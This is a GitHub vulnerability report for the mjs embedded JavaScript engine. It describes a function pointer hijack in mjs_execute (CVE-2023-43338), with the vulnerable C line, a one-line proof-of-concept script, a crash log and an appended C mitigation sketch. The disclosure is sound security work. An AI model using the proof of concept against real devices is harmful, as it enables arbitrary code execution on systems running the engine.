cesanta / mjs

Embedded JavaScript engine for C/C++
https://mongoose-os.com

Function Pointer Hijack mjs/mjs.c in mjs_execute #250

Open cla7aye15I4nd opened 11 months ago

cla7aye15I4nd commented 11 months ago

Function Pointer Hijack mjs/mjs.c in mjs_execute

Affected Projects

mjs 2.20.0 (https://github.com/cesanta/mjs)

Problem Type

CWE-822 (Untrusted Pointer Dereference)

Description

I discovered a vulnerability that could potentially lead to function pointer hijacking. I believe this is a logical vulnerability since it does not trigger any out-of-bounds (OOB) or use-after-free (UAF) assertions when compiled with AddressSanitizer. An attacker can exploit this vulnerability by providing a specially crafted input to the affected program, leading to the execution of arbitrary code.

The function hijack happened in mjs.c:8824

call_stack_push_frame(mjs, bp.start_idx + i, retval_stack_idx);

/* Perform the cfunction call */
((void (*) (struct mjs *)) mjs_get_ptr(mjs, *func))(mjs);

call_stack_restore_frame(mjs);

PoC:

print-=2;print("A");

Log:

$ clang -g -O2 -o mjs mjs.c -DMJS_MAIN
$ ./mjs poc.js 
Illegal instruction
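The report shows the engine casting whatever the function value currently holds to a code pointer and calling it, so script arithmetic on that value yields an untrusted pointer. As an added illustration of the mitigation a maintainer would want, the following stand-alone C sketch (hypothetical names, not mjs's own value model or API) keeps a table of registered native functions and refuses any indirect call whose target is not in that table.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical value model, not mjs's own: a native function value
 * carries a raw code pointer, and script arithmetic on such a value
 * (the report's `print-=2`) is what produces an untrusted pointer. */
typedef void (*native_fn)(int *ctx);

#define MAX_NATIVES 8
static native_fn g_natives[MAX_NATIVES]; /* registration table */
static size_t g_num_natives;

/* Record a native at registration time; returns 0 on success. */
static int register_native(native_fn fn) {
    if (g_num_natives >= MAX_NATIVES) return -1;
    g_natives[g_num_natives++] = fn;
    return 0;
}

/* Mitigation: only pointers that were registered may be called. */
static int is_registered_native(uintptr_t p) {
    for (size_t i = 0; i < g_num_natives; i++)
        if ((uintptr_t)g_natives[i] == p) return 1;
    return 0;
}

/* Guarded replacement for the bare cast-and-call in the report.
 * Returns 1 if the call was made, 0 if the target was refused. */
static int call_native_checked(uintptr_t p, int *ctx) {
    if (!is_registered_native(p)) return 0;
    ((native_fn)p)(ctx);
    return 1;
}

/* Stand-in for a registered builtin such as print(). */
static void native_print(int *ctx) { (*ctx)++; }

int main(void) {
    int calls = 0;
    register_native(native_print);
    uintptr_t good = (uintptr_t)native_print;
    uintptr_t bad = good - 2; /* what `print-=2` does to the raw pointer */
    printf("registered target called: %d\n", call_native_checked(good, &calls));
    printf("corrupted target called:  %d\n", call_native_checked(bad, &calls));
    return 0;
}
```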
cla7aye15I4nd commented 11 months ago

Assigned CVE-2023-43338